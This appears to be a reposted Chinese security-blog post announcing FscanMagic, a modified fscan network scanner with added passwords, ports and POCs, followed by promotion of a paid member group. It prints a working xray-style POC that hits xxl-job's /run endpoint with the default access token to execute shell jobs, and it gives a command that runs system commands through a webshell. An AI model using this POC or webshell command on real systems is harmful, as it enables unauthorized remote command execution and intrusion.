FscanMagic
2023-11-10 11:30:25 Author: 鹏组安全(查看原文) 阅读量:22 收藏

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.


添加常见密码

添加常见端口

输出信息添加不同颜色

增加常见的POC

新增加了一些常见的POC(内网中经常遇到),如:海康威视、大华、华三、华为、xxl_job、宏景......

poc模版与xray的相似

name: poc-yaml-xxl_job_accessToken
rules: - method: POST path: "/run" headers: Content-Type: application/json XXL-JOB-ACCESS-TOKEN: default_token body: |- {"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0} expression: |      response.status == 200 && response.body.bcontains(bytes('{"code":200}'))

webshell管理

./fscan -WHost "url" -Wcommand "system('whoami');" -WebShellPasswd "密码"

添加了两个参数

-WHost:webshell的url,如:http://127.0.0.1/webshell.php

-WebShellPasswd:webshell的密码,如:123456

脚本已放置星球

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

星球内部活动展示

好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NDU3NDA3OQ==&mid=2247489978&idx=1&sn=a013ba652f195392ec32157f506d54c1&chksm=c01cd52af76b5c3c83897826ccb6898da9988282fad33dad4f1c87f9a3dd9ffd8233f0963b2d&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh